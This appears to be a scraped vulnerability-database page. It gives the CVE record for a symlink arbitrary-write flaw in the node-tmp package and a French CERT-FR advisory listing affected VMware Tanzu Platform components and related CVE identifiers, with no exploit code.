Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-54798 (GCVE-0-2025-54798)
Vulnerability from cvelistv5
Published
2025-08-07 00:04
Modified
2025-11-03 20:06
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-59 - Improper Link Resolution Before File Access ('Link Following')
Summary
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-54798",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-07T14:04:19.811342Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-07T14:04:24.089Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T20:06:39.242Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "node-tmp",
"vendor": "raszi",
"versions": [
{
"status": "affected",
"version": "\u003c 0.2.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-59",
"description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-07T00:04:35.370Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"name": "https://github.com/raszi/node-tmp/issues/207",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"name": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
}
],
"source": {
"advisory": "GHSA-52f5-9888-hmc6",
"discovery": "UNKNOWN"
},
"title": "tmp does not restrict arbitrary temporary file / directory write via symbolic link `dir` parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-54798",
"datePublished": "2025-08-07T00:04:35.370Z",
"dateReserved": "2025-07-29T16:50:28.395Z",
"dateUpdated": "2025-11-03T20:06:39.242Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-54798\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-07T01:15:26.203\",\"lastModified\":\"2025-11-03T20:19:15.177\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.\"},{\"lang\":\"es\",\"value\":\"tmp es un creador de archivos y directorios temporales para Node.js. En las versiones 0.2.3 y anteriores, tmp es vulnerable a la escritura arbitraria de archivos o directorios temporales mediante el par\u00e1metro dir de enlace simb\u00f3lico. Esto se solucion\u00f3 en la versi\u00f3n 0.2.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":2.5,\"baseSeverity\":\"LOW\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.0,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:raszi:tmp:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.2.4\",\"matchCriteriaId\":\"463A9FBD-7DD2-46BD-96B9-0A107149FF94\"}]}]}],\"references\":[{\"url\":\"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/raszi/node-tmp/issues/207\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-11-03T20:06:39.242Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54798\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-07T14:04:19.811342Z\"}}}], \"references\": [{\"url\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-07T14:04:16.546Z\"}}], \"cna\": {\"title\": \"tmp does not restrict arbitrary temporary file / directory write via symbolic link `dir` parameter\", \"source\": {\"advisory\": \"GHSA-52f5-9888-hmc6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 2.5, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"raszi\", \"product\": \"node-tmp\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.2.4\"}]}], \"references\": [{\"url\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"name\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/raszi/node-tmp/issues/207\", \"name\": \"https://github.com/raszi/node-tmp/issues/207\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\", \"name\": \"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-59\", \"description\": \"CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-07T00:04:35.370Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-54798\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-03T20:06:39.242Z\", \"dateReserved\": \"2025-07-29T16:50:28.395Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-07T00:04:35.370Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2025-AVI-0967
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Platform | File Integrity Monitoring pour VMware Tanzu Platform versions antérieures à 2.1.49 | ||
| VMware | Tanzu Platform | Cloud Service Broker pour Azure pour VMware Tanzu Platform versions antérieures à 1.13.1 | ||
| VMware | Tanzu Platform | AI Services pour VMware Tanzu Platform versions antérieures à 10.3.0 | ||
| VMware | Tanzu Platform | Scheduler pour VMware Tanzu Platform versions antérieures à 2.0.21 | ||
| VMware | Tanzu Platform | Foundation Core pour VMware Tanzu Platform versions antérieures à 3.1.4 | ||
| VMware | Tanzu Platform | Elastic Application Runtime pour VMware Tanzu Platform versions antérieures à 10.2.4+LTS-T | ||
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 6.0.21+LTS-T | ||
| VMware | Tanzu Platform | .NET Core Buildpack versions antérieures à 2.4.64 | ||
| VMware | Tanzu Platform | VMware Tanzu Data Flow sur Tanzu Platform versions antérieures à 2.0.0 | ||
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 10.2.4 | ||
| VMware | Tanzu Platform | CredHub Secrets Management pour VMware Tanzu Platform versions antérieures à 1.6.7 | ||
| VMware | Tanzu Platform | Extended App Support pour Tanzu Platform versions antérieures à 1.0.8 | ||
| VMware | Tanzu Platform | Go Buildpack versions antérieures à 1.10.57 | ||
| VMware | Tanzu Platform | VMware Tanzu RabbitMQ sur Tanzu Platform versions antérieures à 10.1.0 | ||
| VMware | Tanzu Platform | NodeJS Buildpack versions antérieures à 1.8.61 | ||
| VMware | Tanzu Platform | Foundation Core pour VMware Tanzu Platform versions antérieures à 3.2.0 | ||
| VMware | Tanzu Platform | Application Services pour VMware Tanzu Platform versions antérieures à 3.3.11 | ||
| VMware | Tanzu Platform | IPsec Encryption pour VMware Tanzu Platform versions antérieures à 1.9.68 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "File Integrity Monitoring pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.1.49",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Cloud Service Broker pour Azure pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.13.1",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "AI Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Scheduler pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.0.21",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Foundation Core pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.1.4",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.21+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": ".NET Core Buildpack versions ant\u00e9rieures \u00e0 2.4.64",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu Data Flow sur Tanzu Platform versions ant\u00e9rieures \u00e0 2.0.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "CredHub Secrets Management pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.6.7",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Extended App Support pour Tanzu Platform versions ant\u00e9rieures \u00e0 1.0.8",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Go Buildpack versions ant\u00e9rieures \u00e0 1.10.57",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu RabbitMQ sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.1.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "NodeJS Buildpack versions ant\u00e9rieures \u00e0 1.8.61",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Foundation Core pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.2.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Application Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.3.11",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "IPsec Encryption pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.9.68",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-1343",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1343"
},
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-30681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30681"
},
{
"name": "CVE-2023-0216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0216"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2022-1473",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1473"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2020-14621",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14621"
},
{
"name": "CVE-2023-0401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0401"
},
{
"name": "CVE-2025-59830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59830"
},
{
"name": "CVE-2023-21843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21843"
},
{
"name": "CVE-2024-36138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36138"
},
{
"name": "CVE-2020-2803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2803"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-30689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30689"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2024-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22020"
},
{
"name": "CVE-2025-30715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30715"
},
{
"name": "CVE-2025-30682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30682"
},
{
"name": "CVE-2021-35586",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35586"
},
{
"name": "CVE-2025-25186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25186"
},
{
"name": "CVE-2025-50102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50102"
},
{
"name": "CVE-2025-55248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55248"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2021-35550",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35550"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2021-35567",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35567"
},
{
"name": "CVE-2020-14579",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14579"
},
{
"name": "CVE-2025-50100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50100"
},
{
"name": "CVE-2023-21954",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21954"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2021-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2163"
},
{
"name": "CVE-2024-21890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21890"
},
{
"name": "CVE-2024-21896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21896"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2025-40026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40026"
},
{
"name": "CVE-2022-1292",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1292"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2024-7409",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7409"
},
{
"name": "CVE-2025-30703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30703"
},
{
"name": "CVE-2023-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21830"
},
{
"name": "CVE-2021-2161",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2161"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2021-2341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2341"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2025-50080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50080"
},
{
"name": "CVE-2024-6505",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6505"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2020-14593",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14593"
},
{
"name": "CVE-2025-50078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50078"
},
{
"name": "CVE-2020-14664",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14664"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2020-14797",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14797"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2020-14798",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14798"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2024-43484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43484"
},
{
"name": "CVE-2025-24293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24293"
},
{
"name": "CVE-2025-30696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30696"
},
{
"name": "CVE-2025-55752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
},
{
"name": "CVE-2022-21299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21299"
},
{
"name": "CVE-2020-2773",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2773"
},
{
"name": "CVE-2024-22025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22025"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2020-14578",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14578"
},
{
"name": "CVE-2025-21584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21584"
},
{
"name": "CVE-2020-2805",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2805"
},
{
"name": "CVE-2025-58767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58767"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2020-2830",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2830"
},
{
"name": "CVE-2025-54798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54798"
},
{
"name": "CVE-2022-21624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21624"
},
{
"name": "CVE-2020-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2781"
},
{
"name": "CVE-2022-21305",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21305"
},
{
"name": "CVE-2020-14556",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14556"
},
{
"name": "CVE-2025-50085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50085"
},
{
"name": "CVE-2020-14792",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14792"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2024-3447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3447"
},
{
"name": "CVE-2022-2068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2068"
},
{
"name": "CVE-2022-21271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21271"
},
{
"name": "CVE-2025-61919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61919"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2025-27210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27210"
},
{
"name": "CVE-2025-61771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61771"
},
{
"name": "CVE-2025-61770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61770"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2022-4203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4203"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2023-46809",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46809"
},
{
"name": "CVE-2024-21510",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21510"
},
{
"name": "CVE-2022-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21626"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2020-14781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14781"
},
{
"name": "CVE-2025-30683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30683"
},
{
"name": "CVE-2025-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30699"
},
{
"name": "CVE-2025-61921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61921"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38229"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23167"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2024-43483",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43483"
},
{
"name": "CVE-2025-50094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50094"
},
{
"name": "CVE-2021-35559",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35559"
},
{
"name": "CVE-2023-0217",
